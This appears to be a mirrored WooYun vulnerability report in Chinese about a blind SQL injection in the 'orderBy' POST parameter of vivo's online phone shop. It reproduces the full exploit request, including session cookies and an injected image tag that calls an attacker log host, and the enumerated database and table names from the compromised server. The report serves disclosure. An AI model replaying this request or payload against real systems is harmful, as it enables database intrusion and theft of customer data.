乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-20: 细节已通知厂商并且等待厂商处理中 2015-06-25: 厂商已经主动忽略漏洞,细节向公众公开
手机商城的漏洞
hello
shop.vivo.com.cn
POST盲注
POST /gallery-ajax_get_goods.html HTTP/1.1Content-Length: 188Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://shop.vivo.com.cn:80/Cookie: s=ebb5b05749aee0c61fae46410fb69ad1; vary=0c5b5e6f5531906a298dd31796d1d58b292b01cacec671a7013fa39a266bad1c; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fshop.vivo.com.cn%3A80%2F; S[GALLERY][FILTER]=nofilter; S[SEARCH_KEY]=e%26lt%3Bimg%2520sRc%3D%27http%3A%2F%2Fattacker-961779%2Flog.php%3FHost: shop.vivo.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*cat_id=&orderBy=123&scontent=n,the&showtype=list&&virtual_cat_id=
字段
orderBy
数据库
available databases [8]:[*] cacti[*] information_schema[*] mysql[*] performance_schema[*] seckill[*] test[*] vivo0c07[*] vivo_qhm
这当中还少了一个所属的数据库
vivo_store
只是看了下数据库的表
Database: vivo_store[182 tables]+-----------------------------------------+| sdb_aftersales_return_product || sdb_apiactionlog_apilog || sdb_b2c_archive_orders || sdb_b2c_brand || sdb_b2c_cart || sdb_b2c_cart_objects || sdb_b2c_college || sdb_b2c_comment_goods_point || sdb_b2c_comment_goods_type || sdb_b2c_contract_package || sdb_b2c_contract_package_numbers || sdb_b2c_counter || sdb_b2c_counter_attach || sdb_b2c_coupon_map || sdb_b2c_coupon_vivo || sdb_b2c_coupon_vivo_info || sdb_b2c_coupon_vivo_list || sdb_b2c_coupon_vivo_xshot || sdb_b2c_coupons || sdb_b2c_delivery || sdb_b2c_delivery_items || sdb_b2c_dly_h_area || sdb_b2c_dlycorp || sdb_b2c_dlytype || sdb_b2c_flashlottery_aog || sdb_b2c_flashlottery_award || sdb_b2c_flashlottery_winner || sdb_b2c_goods || sdb_b2c_goods_cat || sdb_b2c_goods_contract_package || sdb_b2c_goods_keywords || sdb_b2c_goods_lv_price || sdb_b2c_goods_promotion_ref || sdb_b2c_goods_question || sdb_b2c_goods_rate || sdb_b2c_goods_spec_index || sdb_b2c_goods_store_prompt || sdb_b2c_goods_type || sdb_b2c_goods_type_props || sdb_b2c_goods_type_props_value || sdb_b2c_goods_type_spec || sdb_b2c_goods_virtual_cat || sdb_b2c_lottery_award || sdb_b2c_lottery_log || sdb_b2c_lottery_winner || sdb_b2c_member_addrs || sdb_b2c_member_advance || sdb_b2c_member_college || sdb_b2c_member_comments || sdb_b2c_member_coupon || sdb_b2c_member_goods || sdb_b2c_member_limit_ip || sdb_b2c_member_lv || sdb_b2c_member_msg || sdb_b2c_member_point || sdb_b2c_member_pwdlog || sdb_b2c_member_secret || sdb_b2c_member_share_history || sdb_b2c_member_systmpl || sdb_b2c_members || sdb_b2c_order_coupon_user || sdb_b2c_order_delivery || sdb_b2c_order_items || sdb_b2c_order_log || sdb_b2c_order_objects || sdb_b2c_order_pmt || sdb_b2c_orders || sdb_b2c_preorders_sales_rule || sdb_b2c_products || sdb_b2c_reship || sdb_b2c_reship_items || sdb_b2c_sales_rule_goods || sdb_b2c_sales_rule_order || sdb_b2c_sell_logs || sdb_b2c_shop || sdb_b2c_spec_values || sdb_b2c_specification || sdb_b2c_type_brand || sdb_b2c_xfive_coupon_log || sdb_b2c_xfiveblue_preorder || sdb_b2c_xfivepro_preorder || sdb_base_app_content || sdb_base_apps || sdb_base_cache_expires || sdb_base_crontab || sdb_base_files || sdb_base_kvstore || sdb_base_network || sdb_base_queue || sdb_base_rpcnotify || sdb_base_rpcpoll || sdb_base_syscache_resources || sdb_content_article_bodys || sdb_content_article_indexs || sdb_content_article_nodes || sdb_couponlog_order_coupon_ref || sdb_couponlog_order_coupon_user || sdb_dbeav_meta_register || sdb_dbeav_meta_value_datetime || sdb_dbeav_meta_value_decimal || sdb_dbeav_meta_value_int || sdb_dbeav_meta_value_longtext || sdb_dbeav_meta_value_text || sdb_dbeav_meta_value_varchar || sdb_dbeav_recycle || sdb_desktop_filter || sdb_desktop_flow || sdb_desktop_hasrole || sdb_desktop_menus || sdb_desktop_recycle || sdb_desktop_role_flow || sdb_desktop_roles || sdb_desktop_tag || sdb_desktop_tag_rel || sdb_desktop_user_flow || sdb_desktop_users || sdb_ectools_analysis || sdb_ectools_analysis_logs || sdb_ectools_currency || sdb_ectools_order_bills || sdb_ectools_payments || sdb_ectools_payments_log_callback || sdb_ectools_payments_log_request || sdb_ectools_pefunds || sdb_ectools_regions || sdb_express_dly_center || sdb_express_print_tmpl || sdb_gift_cat || sdb_gift_ref || sdb_image_image || sdb_image_image_attach || sdb_importexport_task || sdb_logisticstrack_logistic_log || sdb_operatorlog_logs || sdb_operatorlog_normallogs || sdb_operatorlog_register || sdb_pam_account || sdb_pam_auth || sdb_pam_bind_tag || sdb_pam_log || sdb_pointprofessional_member_point_task || sdb_preorderlog_order_preorder_user || sdb_site_activities_survey || sdb_site_activities_xfivepro || sdb_site_explorers || sdb_site_index_page || sdb_site_link || sdb_site_lucky_draw || sdb_site_menus || sdb_site_modules || sdb_site_purchase || sdb_site_route_statics || sdb_site_seo || sdb_site_themes || sdb_site_themes_file || sdb_site_themes_tmpl || sdb_site_widgets || sdb_site_widgets_instance || sdb_site_widgets_proinstance || sdb_system_matrixset || sdb_system_queue_mysql || sdb_timedbuy_objitems || sdb_upimage_upimage || sdb_wap_explorers || sdb_wap_menus || sdb_wap_modules || sdb_wap_seo || sdb_wap_themes || sdb_wap_themes_file || sdb_wap_themes_tmpl || sdb_wap_widgets || sdb_wap_widgets_instance || sdb_weixin_alert || sdb_weixin_bind || sdb_weixin_menus || sdb_weixin_message || sdb_weixin_message_image || sdb_weixin_message_text || sdb_weixin_safeguard || tmp_53aa3e378d690 || tmp_53bbb6d760ad5 || tmp_53bbc08212460 |+-----------------------------------------+
不看数据了···但是,是手机商城的,危害应该不小吧
过滤·
危害等级:无影响厂商忽略
忽略时间:2015-06-25 23:02
漏洞Rank:15 (WooYun评价)
暂无
